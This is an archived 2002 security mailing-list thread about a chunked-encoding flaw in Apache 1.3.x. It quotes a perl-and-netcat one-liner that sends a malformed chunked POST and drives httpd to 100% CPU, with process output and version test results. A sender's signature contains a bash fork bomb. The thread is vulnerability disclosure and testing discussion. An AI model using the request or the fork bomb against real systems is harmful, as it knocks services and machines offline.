Interesting, but when I tried this against a Stronghold build 3015 (Apache 1.3.22), I get this in my error_log chunked Transfer-Encoding forbidden: http://www/index.html Ideas? Thanks, Jon Horner, CISSP SAIC WebPool jh8at_private Office: (865) 425-5178 Pager: (865) 417-5012 > -----Original Message----- > From: Edwin Groothuis [mailto:edwinat_private] > Sent: Wednesday, June 19, 2002 10:13 PM > To: Przemyslaw Frasunek > Cc: vuln-devat_private > Subject: Re: apache chunked encoding > > > On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote: > > I was playing a bit with chunked encoding vulnerability and > found the > > following. When I send a request to Apache 1.3.24 using malformed > > chunked encoding, httpd process goes into infinite loop and CPU load > > grows to 100%. Example: > > > > perl -e 'print "POST http://www/index.html > HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: > application/x-www-form-urlencoded\r\nTransfer-Encoding: > chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . > "\r\n\r\n"' | nc localhost 80 > > > > 62681 www 63 0 146M 5364K RUN 3:08 45.90% > 45.90% apache > > 42121 www 63 0 139M 2524K RUN 1:15 44.97% > 44.97% apache > > > > Can anyone try it with 1.3.26? > > Apache 1.3.26 doesn't show this behaviour > (yes, I've tried it with 1.3.20 first) > > Edwin > -- > Edwin Groothuis | Personal website: http://www.MavEtJu.org edwinat_private | Interested in MUDs? Visit Fatal Dimensions: bash$ :(){ :|:&};: | http://www.FatalDimensions.org/
This archive was generated by hypermail 2b30 : Thu Jun 20 2002 - 13:59:56 PDT